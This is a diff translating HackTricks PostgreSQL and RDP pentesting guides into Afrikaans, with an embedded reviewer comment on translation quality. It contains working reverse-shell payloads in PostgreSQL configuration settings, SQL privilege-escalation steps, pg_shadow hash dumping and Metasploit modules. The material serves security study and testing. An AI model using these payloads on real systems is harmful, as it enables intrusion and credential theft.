`multi/postgres/postgres_copy_from_program_cmd_exec` module van **metasploit**.\ +Meer inligting oor hierdie kwesbaarheid [**hier**](https://medium.com/greenwolf-security/authenticated-arbitrary-command-execution-on-postgresql-9-3-latest-cd18945914d5). Terwyl dit as CVE-2019-9193 aangemeld is, het Postges verklaar dat dit 'n [kenmerk is en nie reggemaak sal word nie](https://www.postgresql.org/about/news/cve-2019-9193-not-a-security-vulnerability-1935/). 
-### RCE with PostgreSQL Languages +### RCE met PostgreSQL-tale {% content-ref url="../pentesting-web/sql-injection/postgresql-injection/rce-with-postgresql-languages.md" %} [rce-with-postgresql-languages.md](../pentesting-web/sql-injection/postgresql-injection/rce-with-postgresql-languages.md) {% endcontent-ref %} -### RCE with PostgreSQL extensions +### RCE met PostgreSQL-uitbreidings -Once you have **learned** from the previous post **how to upload binary files** you could try obtain **RCE uploading a postgresql extension and loading it**. +Sodra jy **geleer** het van die vorige pos **hoe om binêre lêers op te laai**, kan jy probeer om **RCE te verkry deur 'n postgresql-uitbreiding op te laai en dit te laai**. {% content-ref url="../pentesting-web/sql-injection/postgresql-injection/rce-with-postgresql-extensions.md" %} [rce-with-postgresql-extensions.md](../pentesting-web/sql-injection/postgresql-injection/rce-with-postgresql-extensions.md) {% endcontent-ref %} -### PostgreSQL configuration file RCE +### PostgreSQL-konfigurasie-lêer RCE -The **configuration file** of postgresql is **writable** by the **postgres user** which is the one running the database, so as **superuser** you can write files in the filesystem, and therefore you can **overwrite this file.** +Die **konfigurasie-lêer** van postgresql is **skryfbaar** deur die **postgres-gebruiker** wat die databasis laat loop, sodat jy as **supergebruiker** lêers in die lêersisteem kan skryf, en dus kan jy **hierdie lêer oorskryf**. ![](<../.gitbook/assets/image (303).png>) -#### **RCE with ssl\_passphrase\_command** +#### **RCE met ssl\_passphrase\_command** -More information [about this technique here](https://pulsesecurity.co.nz/articles/postgres-sqli). +Meer inligting [oor hierdie tegniek hier](https://pulsesecurity.co.nz/articles/postgres-sqli). 
-The configuration file have some interesting attributes that can lead to RCE: +Die konfigurasie-lêer het 'n paar interessante eienskappe wat kan lei tot RCE: -* `ssl_key_file = '/etc/ssl/private/ssl-cert-snakeoil.key'` Path to the private key of the database -* `ssl_passphrase_command = ''` If the private file is protected by password (encrypted) postgresql will **execute the command indicated in this attribute**. -* `ssl_passphrase_command_supports_reload = off` **If** this attribute is **on** the **command** executed if the key is protected by password **will be executed** when `pg_reload_conf()` is **executed**. +* `ssl_key_file = '/etc/ssl/private/ssl-cert-snakeoil.key'` Pad na die privaatsleutel van die databasis +* `ssl_passphrase_command = ''` As die privaat lêer deur 'n wagwoord beskerm word (gekripteer), sal postgresql die opdrag uitvoer wat in hierdie eienskap aangedui word. +* `ssl_passphrase_command_supports_reload = off` **As** hierdie eienskap **aan** is, sal die **opdrag** uitgevoer word as die sleutel deur 'n wagwoord beskerm word wanneer `pg_reload_conf()` **uitgevoer** word. -Then, an attacker will need to: +Dan sal 'n aanvaller nodig hê om: -1. **Dump private key** from the server -2. **Encrypt** downloaded private key: - 1. `rsa -aes256 -in downloaded-ssl-cert-snakeoil.key -out ssl-cert-snakeoil.key` -3. **Overwrite** -4. **Dump** the current postgresql **configuration** -5. **Overwrite** the **configuration** with the mentioned attributes configuration: - 1. `ssl_passphrase_command = 'bash -c "bash -i >& /dev/tcp/127.0.0.1/8111 0>&1"'` - 2. `ssl_passphrase_command_supports_reload = on` -6. Execute `pg_reload_conf()` +1. **Dump privaatsleutel** van die bediener +2. **Versleutel** afgelaai privaatsleutel: +1. `rsa -aes256 -in downloaded-ssl-cert-snakeoil.key -out ssl-cert-snakeoil.key` +3. **Oorskryf** +4. **Dump** die huidige postgresql-**konfigurasie** +5. **Oorskryf** die **konfigurasie** met die genoemde eienskappe-konfigurasie: +1. 
`ssl_passphrase_command = 'bash -c "bash -i >& /dev/tcp/127.0.0.1/8111 0>&1"'` +2. `ssl_passphrase_command_supports_reload = on` +6. Voer `pg_reload_conf()` uit -While testing this I noticed that this will only work if the **private key file has privileges 640**, it's **owned by root** and by the **group ssl-cert or postgres** (so the postgres user can read it), and is placed in _/var/lib/postgresql/12/main_. +Tydens die toets van hierdie het ek opgemerk dat dit slegs sal werk as die **privaatsleutel-lêer bevoegdhede 640** het, dit **deur root besit word** en deur die **groep ssl-cert of postgres** (sodat die postgres-gebruiker dit kan lees), en in _/var/lib/postgresql/12/main_ geplaas is. -#### **RCE with archive\_command** +#### **RCE met archive\_command** -**More** [**information about this config and about WAL here**](https://medium.com/dont-code-me-on-that/postgres-sql-injection-to-rce-with-archive-command-c8ce955cf3d3)**.** +**Meer** [**inligting oor hierdie konfigurasie en oor WAL hier**](https://medium.com/dont-code-me-on-that/postgres-sql-injection-to-rce-with-archive-command-c8ce955cf3d3)**.** -Another attribute in the configuration file that is exploitable is `archive_command`. +'n Ander eienskap in die konfigurasie-lêer wat uitgebuit kan word, is `archive_command`. -For this to work, the `archive_mode` setting has to be `'on'` or `'always'`. If that is true, then we could overwrite the command in `archive_command` and force it to execute via the WAL (write-ahead logging) operations. +Om dit te laat werk, moet die `archive_mode`-instelling `'on'` of `'always'` wees. As dit waar is, kan ons die opdrag in `archive_command` oorskryf en dit dwing om uitgevoer te word via die WAL (write-ahead logging) operasies. -The general steps are: +Die algemene stappe is: -1. Check whether archive mode is enabled: `SELECT current_setting('archive_mode')` -2. Overwrite `archive_command` with the payload. 
For eg, a reverse shell: `archive_command = 'echo "dXNlIFNvY2tldDskaT0iMTAuMC4wLjEiOyRwPTQyNDI7c29ja2V0KFMsUEZfSU5FVCxTT0NLX1NUUkVBTSxnZXRwcm90b2J5bmFtZSgidGNwIikpO2lmKGNvbm5lY3QoUyxzb2NrYWRkcl9pbigkcCxpbmV0X2F0b24oJGkpKSkpe29wZW4oU1RESU4sIj4mUyIpO29wZW4oU1RET1VULCI+JlMiKTtvcGVuKFNUREVSUiwiPiZTIik7ZXhlYygiL2Jpbi9zaCAtaSIpO307" | base64 --decode | perl'` -3. Reload the config: `SELECT pg_reload_conf()` -4. Force the WAL operation to run, which will call the archive command: `SELECT pg_switch_wal()` or `SELECT pg_switch_xlog()` for some Postgres versions +1. Kontroleer of argiefmodus geaktiveer is: `SELECT current_setting('archive_mode')` +2. Oorskryf `archive_command` met die payload. Byvoorbeeld, 'n omgekeerde dop: `archive_command = 'echo "dXNlIFNvY2tldDskaT0iMTAuMC4wLjEiOyRwPTQyNDI7c29ja2V0KFMsUEZfSU5FVCxTT0NLX1NUUkVBTSxnZXRwcm90b2J5bmFtZSgidGNwIikpO2lmKGNvbm5lY3QoUyxzb2NrYWRkcl9pbigkcCxpbmV0X2F0b24oJGkpKSkpe29wZW4oU1RESU4sIj4mUyIpO29wZW4oU1RET1VULCI+JlMiKTtvcGVuKFNUREVSUiwiPiZTIik7ZXhlYygiL2Jpbi9zaCAtaSIpO307" | base64 --decode | perl'` +3. Laai die konfigurasie weer: `SELECT pg_reload_conf()` +4. Dwang die WAL-operasie om uit te voer, wat die argiefopdrag sal oproep: `SELECT pg_switch_wal()` of `SELECT pg_switch_xlog()` vir sommige Postgres-weergawes ## **Postgres Privesc** 
@@ -442,10 +672,9 @@ The general steps are: #### **Grant** -According to the [**docs**](https://www.postgresql.org/docs/13/sql-grant.html): _Roles having **`CREATEROLE`** privilege can **grant or revoke membership in any role** that is **not** a **superuser**._ - -So, if you have **`CREATEROLE`** permission you could grant yourself access to other **roles** (that aren't superuser) that can give you the option to read & write files and execute commands: +Volgens die [**dokumentasie**](https://www.postgresql.org/docs/13/sql-grant.html): _Rolle wat die **`CREATEROLE`**-bevoegdheid het, kan **lidmaatskap in enige rol toeken of herroep** wat **nie** 'n **supergebruiker** is nie._ +Dus, as jy **`CREATEROLE`** toestemming het, kan jy jouself toegang gee tot ander **rolle** (wat nie supergebruiker is nie) wat jou die opsie kan gee om lêers te lees en skryf en opdragte uit te voer: ```sql # Access to execute commands GRANT pg_execute_server_program TO username; 
@@ -454,27 +683,21 @@ GRANT pg_read_server_files TO username; # Access to write files GRANT pg_write_server_files TO username; ``` +#### Verander Wagwoord -#### Modify Password - -Users with this role can also **change** the **passwords** of other **non-superusers**: - +Gebruikers met hierdie rol kan ook die wagwoorde van ander nie-supergebruikers **verander**: ```sql #Change password ALTER USER user_name WITH PASSWORD 'new_password'; ``` +#### Privesc na SUPERUSER -#### Privesc to SUPERUSER - -It's pretty common to find that **local users can login in PostgreSQL without providing any password**. Therefore, once you have gathered **permissions to execute code** you can abuse these permissions to gran you **`SUPERUSER`** role: - +Dit is redelik algemeen om te vind dat **plaaslike gebruikers kan inlog in PostgreSQL sonder om enige wagwoord te verskaf**. Daarom, sodra jy **toestemmings het om kode uit te voer**, kan jy hierdie toestemmings misbruik om die **`SUPERUSER`** rol te verkry: ```sql COPY (select '') to PROGRAM 'psql -U -c "ALTER USER WITH SUPERUSER;"'; ``` - {% hint style="info" %} -This is usually possible because of the following lines in the **`pg_hba.conf`** file: - +Dit is gewoonlik moontlik as gevolg van die volgende lyne in die **`pg_hba.conf`** lêer: ```bash # "local" is for Unix domain socket connections only local all all trust 
@@ -485,147 +708,131 @@ host all all ::1/128 trust ``` {% endhint %} -### **ALTER TABLE privesc** +### **ALTER TABEL privesc** -In [**this writeup**](https://www.wiz.io/blog/the-cloud-has-an-isolation-problem-postgresql-vulnerabilities) is explained how it was possible to **privesc** in Postgres GCP abusing ALTER TABLE privilege that was granted to the user. +In [**hierdie skryfstuk**](https://www.wiz.io/blog/the-cloud-has-an-isolation-problem-postgresql-vulnerabilities) word verduidelik hoe dit moontlik was om **privesc** in Postgres GCP te doen deur misbruik te maak van die ALTER TABEL-voorreg wat aan die gebruiker verleen is. -When you try to **make another user owner of a table** you should get an **error** preventing it, but apparently GCP gave that **option to the not-superuser postgres user** in GCP: +Wanneer jy probeer om 'n **ander gebruiker eienaar van 'n tabel** te maak, behoort jy 'n **fout** te kry wat dit verhoed, maar blykbaar het GCP daardie **opsie aan die nie-supergebruiker postgres-gebruiker** gegee:
-Joining this idea with the fact that when the **INSERT/UPDATE/**[**ANALYZE**](https://www.postgresql.org/docs/13/sql-analyze.html) commands are executed on a **table with an index function**, the **function** is **called** as part of the command with the **table** **owner’s permissions**. It's possible to create an index with a function and give owner permissions to a **super user** over that table, and then run ANALYZE over the table with the malicious function that will be able to execute commands because it's using the privileges of the owner. - +Deur hierdie idee te koppel met die feit dat wanneer die **INSERT/UPDATE/**[**ANALYZE**](https://www.postgresql.org/docs/13/sql-analyze.html)-opdragte uitgevoer word op 'n **tabel met 'n indeksfunksie**, word die **funksie** as deel van die opdrag **geroep** met die **eienaar se toestemmings**. Dit is moontlik om 'n indeks met 'n funksie te skep en eienaarstoestemmings aan 'n **supergebruiker** oor daardie tabel te gee, en dan ANALYZE uit te voer oor die tabel met die skadelike funksie wat opdragte kan uitvoer omdat dit die voorregte van die eienaar gebruik. ```c -GetUserIdAndSecContext(&save_userid, &save_sec_context); -SetUserIdAndSecContext(onerel->rd_rel->relowner, - save_sec_context | SECURITY_RESTRICTED_OPERATION); +GetUserIdAndSecContext(&save_userid, &save_sec_context); +SetUserIdAndSecContext(onerel->rd_rel->relowner, +save_sec_context | SECURITY_RESTRICTED_OPERATION); ``` +#### Uitbuiting -#### Exploitation - -1. Start by creating a new table. -2. Insert some irrelevant content into the table to provide data for the index function. -3. Develop a malicious index function that contains a code execution payload, allowing for unauthorized commands to be executed. -4. ALTER the table's owner to "cloudsqladmin," which is GCP's superuser role exclusively used by Cloud SQL to manage and maintain the database. -5. Perform an ANALYZE operation on the table. 
This action compels the PostgreSQL engine to switch to the user context of the table's owner, "cloudsqladmin." Consequently, the malicious index function is called with the permissions of "cloudsqladmin," thereby enabling the execution of the previously unauthorized shell command. - -In PostgreSQL, this flow looks something like this: +1. Begin deur 'n nuwe tabel te skep. +2. Voeg irrelevante inhoud by die tabel in om data vir die indeksfunksie te voorsien. +3. Ontwikkel 'n skadelike indeksfunksie wat 'n koderingsuitvoerlading bevat, wat die uitvoering van ongemagtigde bevele moontlik maak. +4. ALTER die eienaar van die tabel na "cloudsqladmin," wat GCP se supergebruikersrol is wat uitsluitlik deur Cloud SQL gebruik word om die databasis te bestuur en te onderhou. +5. Voer 'n ANALYZE-operasie op die tabel uit. Hierdie aksie dwing die PostgreSQL-enjin om oor te skakel na die gebruikerskonteks van die tabel se eienaar, "cloudsqladmin." Gevolglik word die skadelike indeksfunksie geroep met die toestemmings van "cloudsqladmin," wat die uitvoering van die voorheen ongemagtigde skilbevel moontlik maak. 
+In PostgreSQL lyk hierdie vloei soos volg: ```sql CREATE TABLE temp_table (data text); CREATE TABLE shell_commands_results (data text); - + INSERT INTO temp_table VALUES ('dummy content'); - -/* PostgreSQL does not allow creating a VOLATILE index function, so first we create IMMUTABLE index function */ + +/* PostgreSQL does not allow creating a VOLATILE index function, so first we create IMMUTABLE index function */ CREATE OR REPLACE FUNCTION public.suid_function(text) RETURNS text - LANGUAGE sql IMMUTABLE AS 'select ''nothing'';'; - +LANGUAGE sql IMMUTABLE AS 'select ''nothing'';'; + CREATE INDEX index_malicious ON public.temp_table (suid_function(data)); - + ALTER TABLE temp_table OWNER TO cloudsqladmin; - -/* Replace the function with VOLATILE index function to bypass the PostgreSQL restriction */ + +/* Replace the function with VOLATILE index function to bypass the PostgreSQL restriction */ CREATE OR REPLACE FUNCTION public.suid_function(text) RETURNS text - LANGUAGE sql VOLATILE AS 'COPY public.shell_commands_results (data) FROM PROGRAM ''/usr/bin/id''; select ''test'';'; - +LANGUAGE sql VOLATILE AS 'COPY public.shell_commands_results (data) FROM PROGRAM ''/usr/bin/id''; select ''test'';'; + ANALYZE public.temp_table; ``` - -Then, the `shell_commands_results` table will contain the output of the executed code: - +Dan sal die `shell_commands_results` tabel die uitvoer van die uitgevoerde kode bevat: ``` uid=2345(postgres) gid=2345(postgres) groups=2345(postgres) ``` +### Plaaslike Aantekening -### Local Login - -Some misconfigured postgresql instances might allow login of any local user, it's possible to local from 127.0.0.1 using the **`dblink` function**: - +Sommige verkeerd gekonfigureerde postgresql-instanties mag enige plaaslike gebruiker toelaat om aan te teken, dit is moontlik om plaaslik vanaf 127.0.0.1 aan te teken deur die **`dblink`-funksie** te gebruik: ```sql \du * # Get Users \l # Get databases SELECT * FROM dblink('host=127.0.0.1 - port=5432 - 
user=someuser - password=supersecret - dbname=somedb', - 'SELECT usename,passwd from pg_shadow') +port=5432 +user=someuser +password=supersecret +dbname=somedb', +'SELECT usename,passwd from pg_shadow') RETURNS (result TEXT); ``` - {% hint style="warning" %} -Note that for the previos query to work **the function `dblink` needs to exist**. If it doesn't you could try to create it with - +Let daarop dat vir die vorige navraag om te werk, **moet die funksie `dblink` bestaan**. As dit nie bestaan nie, kan jy probeer om dit te skep met ```sql CREATE EXTENSION dblink; ``` {% endhint %} -If you have the password of a user with more privileges, but the user is not allowed to login from an external IP you can use the following function to execute queries as that user: - +As jy die wagwoord van 'n gebruiker met meer bevoegdhede het, maar die gebruiker mag nie vanaf 'n eksterne IP-adres aanmeld nie, kan jy die volgende funksie gebruik om navrae uit te voer as daardie gebruiker: ```sql SELECT * FROM dblink('host=127.0.0.1 - user=someuser - dbname=somedb', - 'SELECT usename,passwd from pg_shadow') - RETURNS (result TEXT); +user=someuser +dbname=somedb', +'SELECT usename,passwd from pg_shadow') +RETURNS (result TEXT); ``` - -It's possible to check if this function exists with: - +Dit is moontlik om te kontroleer of hierdie funksie bestaan met: ```sql SELECT * FROM pg_proc WHERE proname='dblink' AND pronargs=2; ``` +### **Aangepaste gedefinieerde funksie met** SECURITY DEFINER -### **Custom defined function with** SECURITY DEFINER +[**In hierdie uiteensetting**](https://www.wiz.io/blog/hells-keychain-supply-chain-attack-in-ibm-cloud-databases-for-postgresql), was pentesters in staat om privesc binne 'n postgres-instansie wat deur IBM voorsien word, omdat hulle **hierdie funksie met die SECURITY DEFINER-vlag gevind het**: -[**In this writeup**](https://www.wiz.io/blog/hells-keychain-supply-chain-attack-in-ibm-cloud-databases-for-postgresql), pentesters were able to privesc inside 
a postgres instance provided by IBM, because they **found this function with the SECURITY DEFINER flag**: +
CREATE OR REPLACE FUNCTION public.create_subscription(IN subscription_name text,IN host_ip text,IN portnum text,IN password text,IN username text,IN db_name text,IN publisher_name text)
+RETURNS text
+LANGUAGE 'plpgsql'
+    VOLATILE SECURITY DEFINER
+    PARALLEL UNSAFE
+COST 100
 
-
CREATE OR REPLACE FUNCTION public.create_subscription(IN subscription_name text,IN host_ip text,IN portnum text,IN password text,IN username text,IN db_name text,IN publisher_name text) 
-    RETURNS text 
-    LANGUAGE 'plpgsql' 
-    VOLATILE SECURITY DEFINER 
-    PARALLEL UNSAFE 
-    COST 100 
-     
-AS $BODY$ 
-                DECLARE 
-                     persist_dblink_extension boolean; 
-                BEGIN 
-                    persist_dblink_extension := create_dblink_extension(); 
-                    PERFORM dblink_connect(format('dbname=%s', db_name)); 
-                    PERFORM dblink_exec(format('CREATE SUBSCRIPTION %s CONNECTION ''host=%s port=%s password=%s user=%s dbname=%s sslmode=require'' PUBLICATION %s', 
-                                               subscription_name, host_ip, portNum, password, username, db_name, publisher_name)); 
-                    PERFORM dblink_disconnect(); 
-… 
+AS $BODY$
+DECLARE
+persist_dblink_extension boolean;
+BEGIN
+persist_dblink_extension := create_dblink_extension();
+PERFORM dblink_connect(format('dbname=%s', db_name));
+PERFORM dblink_exec(format('CREATE SUBSCRIPTION %s CONNECTION ''host=%s port=%s password=%s user=%s dbname=%s sslmode=require'' PUBLICATION %s',
+subscription_name, host_ip, portNum, password, username, db_name, publisher_name));
+PERFORM dblink_disconnect();
+…
 
-As [**explained in the docs**](https://www.postgresql.org/docs/current/sql-createfunction.html) a function with **SECURITY DEFINER is executed** with the privileges of the **user that owns it**. Therefore, if the function is **vulnerable to SQL Injection** or is doing some **privileged actions with params controlled by the attacker**, it could be abused to **escalate privileges inside postgres**. - -In the line 4 of the previous code you can see that the function has the **SECURITY DEFINER** flag. +Soos [**verduidelik in die dokumentasie**](https://www.postgresql.org/docs/current/sql-createfunction.html) word 'n funksie met **SECURITY DEFINER uitgevoer** met die voorregte van die **gebruiker wat dit besit**. Daarom, as die funksie **kwesbaar is vir SQL-injeksie** of as dit enige **voorregtehandelinge met parameters wat deur die aanvaller beheer word**, kan dit misbruik word om voorregte binne postgres te **verhoog**. +In lyn 4 van die vorige kode kan jy sien dat die funksie die **SECURITY DEFINER**-vlag het. ```sql -CREATE SUBSCRIPTION test3 CONNECTION 'host=127.0.0.1 port=5432 password=a -user=ibm dbname=ibmclouddb sslmode=require' PUBLICATION test2_publication +CREATE SUBSCRIPTION test3 CONNECTION 'host=127.0.0.1 port=5432 password=a +user=ibm dbname=ibmclouddb sslmode=require' PUBLICATION test2_publication WITH (create_slot = false); INSERT INTO public.test3(data) VALUES(current_user); ``` - -And then **execute commands**: +En voer dan **opdragte uit**:
-### Pass Burteforce with PL/pgSQL +### Pas Burteforce toe met PL/pgSQL -**PL/pgSQL** is a **fully featured programming language** that offers greater procedural control compared to SQL. It enables the use of **loops** and other **control structures** to enhance program logic. In addition, **SQL statements** and **triggers** have the capability to invoke functions that are created using the **PL/pgSQL language**. This integration allows for a more comprehensive and versatile approach to database programming and automation.\ -**You can abuse this language in order to ask PostgreSQL to brute-force the users credentials.** +**PL/pgSQL** is 'n **volledig uitgeruste programmeringstaal** wat groter prosedurele beheer bied in vergelyking met SQL. Dit maak die gebruik van **lusse** en ander **beheerstrukture** moontlik om programlogika te verbeter. Daarbenewens het **SQL-opdragte** en **treffers** die vermoë om funksies aan te roep wat met die **PL/pgSQL-taal** geskep is. Hierdie integrasie maak 'n meer omvattende en veelsydige benadering tot databasisprogrammering en outomatisering moontlik.\ +**Jy kan hierdie taal misbruik om PostgreSQL te vra om die gebruikers se geloofsbriewe te burteforce.** {% content-ref url="../pentesting-web/sql-injection/postgresql-injection/pl-pgsql-password-bruteforce.md" %} [pl-pgsql-password-bruteforce.md](../pentesting-web/sql-injection/postgresql-injection/pl-pgsql-password-bruteforce.md) {% endcontent-ref %} ## **POST** - ``` msf> use auxiliary/scanner/postgres/postgres_hashdump msf> use auxiliary/scanner/postgres/postgres_schemadump 
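Review bot: the SQL command name is translated in this hunk's heading and paragraph ("ALTER TABEL privesc", "ALTER TABEL-voorreg"); `ALTER TABLE` must stay as-is, just as `ANALYZE` and `SECURITY DEFINER` are left untouched. Several terms are mistranslated: "koderingsuitvoerlading" for "code execution payload" (use "kode-uitvoeringslading"), "skilbevel" for "shell command" ("shell-opdrag"), "Plaaslike Aantekening" for "Local Login" ("Plaaslike Aanmelding"), and "treffers" for SQL "triggers" (keep "triggers" or use "snellers"); the heading "Pas Burteforce toe met PL/pgSQL" reads as "apply brute force" where the source means password brute force, and it carries the source typo "Burteforce" over. The hunk also rewrites whitespace inside fenced code that a translation should not touch: the continuation line under `SetUserIdAndSecContext(onerel->rd_rel->relowner,` loses its indent, and the `LANGUAGE sql IMMUTABLE ...` line, the dblink `port=5432` / `user=someuser` continuation lines and the `create_subscription` body are all re-indented, which inflates the diff without changing meaning. Finally, the blank lines after `{% hint style="warning" %}` and before several ```sql fences are removed; keep the source layout so paragraphs and hint blocks stay separated.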
@@ -633,11 +840,9 @@ msf> use auxiliary/admin/postgres/postgres_readfile msf> use exploit/linux/postgres/postgres_payload msf> use exploit/windows/postgres/postgres_payload ``` +### logboekhouding -### logging - -Inside the _**postgresql.conf**_ file you can enable postgresql logs changing: - +Binne die _**postgresql.conf**_ lêer kan jy postgresql-logboeke aktiveer deur die volgende te verander: ```bash log_statement = 'all' log_filename = 'postgresql-%Y-%m-%d_%H%M%S.log' 
@@ -646,46 +851,43 @@ sudo service postgresql restart #Find the logs in /var/lib/postgresql//main/log/ #or in /var/lib/postgresql//main/pg_log/ ``` - -Then, **restart the service**. +Daarna, **herlaai die diens**. ### pgadmin -[pgadmin](https://www.pgadmin.org) is an administration and development platform for PostgreSQL.\ -You can find **passwords** inside the _**pgadmin4.db**_ file\ -You can decrypt them using the _**decrypt**_ function inside the script: [https://github.com/postgres/pgadmin4/blob/master/web/pgadmin/utils/crypto.py](https://github.com/postgres/pgadmin4/blob/master/web/pgadmin/utils/crypto.py) - +[pgadmin](https://www.pgadmin.org) is 'n administrasie- en ontwikkelingsplatform vir PostgreSQL.\ +Jy kan **wagwoorde** binne die _**pgadmin4.db**_ lêer vind.\ +Jy kan hulle ontsluit deur die _**decrypt**_ funksie binne die skripsie te gebruik: [https://github.com/postgres/pgadmin4/blob/master/web/pgadmin/utils/crypto.py](https://github.com/postgres/pgadmin4/blob/master/web/pgadmin/utils/crypto.py) ```bash sqlite3 pgadmin4.db ".schema" sqlite3 pgadmin4.db "select * from user;" sqlite3 pgadmin4.db "select * from server;" string pgadmin4.db ``` - ### pg\_hba -Client authentication in PostgreSQL is managed through a configuration file called **pg_hba.conf**. This file contains a series of records, each specifying a connection type, client IP address range (if applicable), database name, user name, and the authentication method to use for matching connections. The first record that matches the connection type, client address, requested database, and user name is used for authentication. There is no fallback or backup if authentication fails. If no record matches, access is denied. +Kliëntverifikasie in PostgreSQL word hanteer deur middel van 'n konfigurasie-lêer genaamd **pg_hba.conf**. 
Hierdie lêer bevat 'n reeks rekords wat elk 'n verbindingskategorie, kliënt-IP-adresreeks (indien van toepassing), databasisnaam, gebruikersnaam en die verifikasiemetode spesifiseer wat gebruik moet word vir ooreenstemmende verbindings. Die eerste rekord wat ooreenstem met die verbindingskategorie, kliëntadres, versoekte databasis en gebruikersnaam, word gebruik vir verifikasie. Daar is geen terugval of rugsteun as verifikasie misluk nie. As geen rekord ooreenstem nie, word toegang geweier. -The available password-based authentication methods in pg_hba.conf are **md5**, **crypt**, and **password**. These methods differ in how the password is transmitted: MD5-hashed, crypt-encrypted, or clear-text. It's important to note that the crypt method cannot be used with passwords that have been encrypted in pg_authid. +Die beskikbare wagwoordgebaseerde verifikasiemetodes in pg_hba.conf is **md5**, **crypt** en **password**. Hierdie metodes verskil in hoe die wagwoord oorgedra word: MD5-gehasht, crypt-gekripteer of duidelike teks. Dit is belangrik om daarop te let dat die crypt-metode nie gebruik kan word met wagwoorde wat in pg_authid gekripteer is nie.
-Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)! +Leer AWS-hacking van nul tot held met htARTE (HackTricks AWS Red Team Expert)! -Other ways to support HackTricks: +Ander maniere om HackTricks te ondersteun: -* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! -* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) -* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** -* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. +* As jy wil sien dat jou **maatskappy geadverteer word in HackTricks** of **HackTricks aflaai in PDF-formaat**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! +* Kry die [**amptelike PEASS & HackTricks-uitrusting**](https://peass.creator-spring.com) +* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFT's**](https://opensea.io/collection/the-peass-family) +* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** +* **Deel jou haktruuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github-opslag.
\ -Use [**Trickest**](https://trickest.com/?utm\_campaign=hacktrics\&utm\_medium=banner\&utm\_source=hacktricks) to easily build and **automate workflows** powered by the world's **most advanced** community tools.\ -Get Access Today: +Gebruik [**Trickest**](https://trickest.com/?utm\_campaign=hacktrics\&utm\_medium=banner\&utm\_source=hacktricks) om maklik werkstrome te bou en outomatiseer met behulp van die wêreld se mees gevorderde gemeenskapsinstrumente.\ +Kry vandag toegang: {% embed url="https://trickest.com/?utm_campaign=hacktrics&utm_medium=banner&utm_source=hacktricks" %} diff --git a/network-services-pentesting/pentesting-rdp.md b/network-services-pentesting/pentesting-rdp.md index 26ed13ba7..bd7988d5d 100644 --- a/network-services-pentesting/pentesting-rdp.md +++ b/network-services-pentesting/pentesting-rdp.md @@ -2,38 +2,36 @@
-Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)! +Leer AWS-hacking van nul tot held met htARTE (HackTricks AWS Red Team Expert)! -Other ways to support HackTricks: +Ander maniere om HackTricks te ondersteun: -* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! -* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) -* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** -* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. +* As jy jou **maatskappy geadverteer wil sien in HackTricks** of **HackTricks in PDF wil aflaai**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! +* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com) +* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling van eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family) +* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** +* **Deel jou hacking-truuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github-opslag.
-**Instantly available setup for vulnerability assessment & penetration testing**. Run a full pentest from anywhere with 20+ tools & features that go from recon to reporting. We don't replace pentesters - we develop custom tools, detection & exploitation modules to give them back some time to dig deeper, pop shells, and have fun. +**Onmiddellik beskikbare opset vir kwetsbaarheidsassessering en penetrasietoetsing**. Voer 'n volledige pentest uit van enige plek met 20+ gereedskap en funksies wat strek van rekognisering tot verslagdoening. Ons vervang nie pentesters nie - ons ontwikkel aangepaste gereedskap, opsporings- en uitbuitingsmodules om hulle 'n bietjie tyd te gee om dieper te graaf, skulpe te kraak en pret te hê. {% embed url="https://pentest-tools.com/" %} -## Basic Information +## Basiese Inligting -Developed by Microsoft, the **Remote Desktop Protocol** (**RDP**) is designed to enable a graphical interface connection between computers over a network. To establish such a connection, **RDP** client software is utilized by the user, and concurrently, the remote computer is required to operate **RDP** server software. This setup allows for the seamless control and access of a distant computer's desktop environment, essentially bringing its interface to the user's local device. - -**Default port:** 3389 +Ontwikkel deur Microsoft, is die **Remote Desktop Protocol** (**RDP**) ontwerp om 'n grafiese interfeesverbinding tussen rekenaars oor 'n netwerk moontlik te maak. Om so 'n verbinding tot stand te bring, word **RDP**-kliënt 